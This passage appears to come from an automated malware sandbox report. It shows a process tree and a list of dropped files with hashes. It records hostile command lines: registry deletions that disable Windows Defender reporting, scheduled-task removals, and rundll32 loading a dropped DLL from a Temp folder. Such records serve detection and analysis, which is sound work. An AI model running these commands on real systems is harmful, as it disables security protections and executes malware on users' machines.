C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:3040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PYxBkvPuMRnFgrady"3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2752
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\prcciRLxuAmrJUJV\bCTwQvCB\DrEsxKF.dll",#1 /Zasite_idEDL 5254032⤵PID:1600
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\prcciRLxuAmrJUJV\bCTwQvCB\DrEsxKF.dll",#1 /Zasite_idEDL 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2908 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UlrsxbhsbQOtZaLyo"4⤵PID:2492
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2296
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2368
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1324
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56c6356c4ac22a174b60abf00c907a5d0
SHA191157aa69f578e33ed1a77b032d9b3da701bd1ab
SHA25667c9f80cf5b63b484945f55fe376762428e03fda3542c3e982f36d9020ac5040
SHA51216e2768ed5f32e5d4e0d416eef150599a4fb7c849dc3c3251c580667e2aecda56876725111cc1b7da36e94317f87405aae7383950dc23f1fb00f7f8da3ab49fe
-
Filesize
2KB
MD59454a2661d1dd48eacb5a01a2cb02b6d
SHA1087124f09d738fecb9e2f972648fcb34d5841576
SHA2561f3d63743467cf796b07e682a83234c35239eeeacbeb5e7fa1a1b3b2d23c8fee
SHA512464b2f22e4ee4e1f5ded470a37a46c3322ee912572b0ec268f94f7bc51f384a6314e44c23ec797b0a822101bc96e5d41e29da2b8f22521339e734d57c6cd274f
-
Filesize
2KB
MD53568eeea554835c69c0817580c24fbcc
SHA1b19a40de2a5c00a7ea504ca4bc12e5af6105fa21
SHA256383368bce26df5993b3bce0fb56649c4538a108ce60fb5fe853bf5bd73712eb8
SHA51283bdf9224cdbbf0f9427fab216a874fdfca0ef95cd848f806249b2f0efc01a9487cfaed94c8ccd4922b4979c38caf1e13d6fef30e756a45f7188d08c8a856967
-
Filesize
2KB
MD56d047bc8f048594817ad817b0c4b2e22
SHA1eb66fcfa8acb4a046434346cc83819a501d43e0d
SHA2564d8fff499f5acc44cd3ef24c96c12897d35d5def6116350367286ae53aa8b6ee
SHA512ec7d2d499b3e5ba7fc6bcf356fab989ea336a026e2af94671dcfebe72f609098b1166b5ae78652bd2733afc707529b4dd4568c8f8980af4a65c64f97be860fc4
-
Filesize
1.4MB
MD5f7f159e484a641f094401160a47d030c
SHA188e9a090a917e6b1684f817512eb3f870e8c49b1
SHA256fefedabc6fc2cb07c4147e63df64df196441467fe567c9c82cc4c7ae4220695e
SHA512e818894be1a01d16dd99cf9a6898ae5cedf7c8c04133efdb7e830d5a6df466990e6244c3563245e3c0fc3a5f111d61ea38e62f9cbf82b33db48e395ac3c32d32
-
Filesize
2KB
MD58981ebfbb5cccd65bc92c7b1183c505f
SHA13dc2840c30443319909dfac29bb2cf21e658fb7a
SHA256df37accd044e54d1cfb481749c4e3c0da0b65430f88ed7f66bcfd6bfd155892d
SHA512cf45e30e9d72b018bc417f78423e97e2934d0c45ee480dd46fff72076068e01895727a8f11804be7186122325f513ded372ad131f675b17ee11506c3f1bf41a5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD504c5b63c22319d17aa5f3a3675774c8d
SHA12ef32a4404ca20aee7f48582122fd906b8da1b86
SHA25633d9bdce1787c96a6ed84e902d2e0d19b4303008203f219f466b013f14a5af35
SHA512073b00603b354b301e637c51fde88f67802b6a838a2c44e18769094476ba8b3b3c677a6441f5063c40a00e96125aa6663783a8a90dda41139383fb0555892aba
-
Filesize
28KB
MD5cdec90c065ea0ad35111744afbe4608c
SHA1d345611c7bfc725131fda4d482fefd4693a1371b
SHA25679d0f6bae0ea9954697d3629d198ebe84a434c730b280f2e5a85aa47ecd33424
SHA51231816409d4d325b8e2ac5eadffff9ff550eceb6a41a43f04555fa1bd9c46a6429fb0f8099a9c501b1c145269be8efd3bb5ea46f2fd9b452f88634891e5bdcb88
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5af2ea2306ee85c9480de40205b134514
SHA11bcab6bc39060b6d43aae8dfe14cc8db888078e4
SHA256766cc253e8d9fd354f55f6d47b14caf96057016fff9fad647799ff41241aa582
SHA51225b0268672ca786a427cfaa881e04ca890e248759be9953cd372d274f34f1a250c40927640e50daf25013cbce3238fdbf291b690f134b98d43f5f82cdbb9bb4d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5de16ad83f174bcf89d8739c88bc70dee
SHA18e16499d8628220925d8e7797eb4b645107ee9e6
SHA25603ba8a29fd0c20eddbdcc525895165bb5eab535475a6f32fc1636de556437ca3
SHA51236918851b7cf6e7840881fc67a23418c6ca6a67da09f8876bb7caaf4946ed991bd5a7fb967ddb1b75c11492e091eeff7045a7131b9b82dea17c5ceb10fa57b00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD506d9dad8d074def2740f64f6fa39d7b5
SHA11c7e38b6b9c89b8b8f0204ba53ee7b1fb52dde5f
SHA256b506b44bb0d6e728784e96c30300da40ca8fc772a5658be2ce302399210572fc
SHA512642380cdddd574995d5e18419c1d5905545f0f9c9fb43c15a0cf5b48de05966f9bfeb3fe3a13ed3c19f0b16f8317425eb144e75e21f1c7b0098cc842e0576ea7
-
Filesize
7KB
MD5c4a72e1f22a0847d6bd180795a1b460d
SHA1cc78f53344c6bddcba6ae663c275b28c7778f8bc
SHA256de167dcbfc6f14d517bd9aaae3b7a6eac8d376c47a9f54c9e6851a51ed71e06c
SHA512604e4af7bbdc540bbfc686e772246380940dc42e4d639a63bf82434412d2ca684c488bacd0196890a24c233834e4492c4511484ba2ed5df192544a4277a0ca20
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
9KB
MD5dedcdda50100cc69eea867c5c89354d0
SHA17f93587fde95720b046c740534c5a6a2d04b4b53
SHA256a3735b9fefb2c335da0649b34ba0dbe075c0f8ac90d2884de0167cf2263da5d7
SHA5122d4636a1a74125735bfcd80846be1b80c5ad88d31d7011bcbc62ef23bc165aceb50b6fdc4482164b333082909291d867cf08b1270d3b07eca1209cbcb2dd23d1
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6KB
MD56030bb610d619a9e6c4b8f0eadf055d9
SHA1726cf03e313aed8653cd2e4ae131f7e833464f79
SHA2562ee94fdb1c7e02c89a80b441a2aea97f7513f053a8c89aa86b812739a5883ca5
SHA512054682d4fb3fba8e392b9d195ca58ce22a7f5aa6c8199a34bd9e2a9c55302d154f27d182ab376263dac8cd5fc788bd661f61caf02e35fb55bf2467701134a61e
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a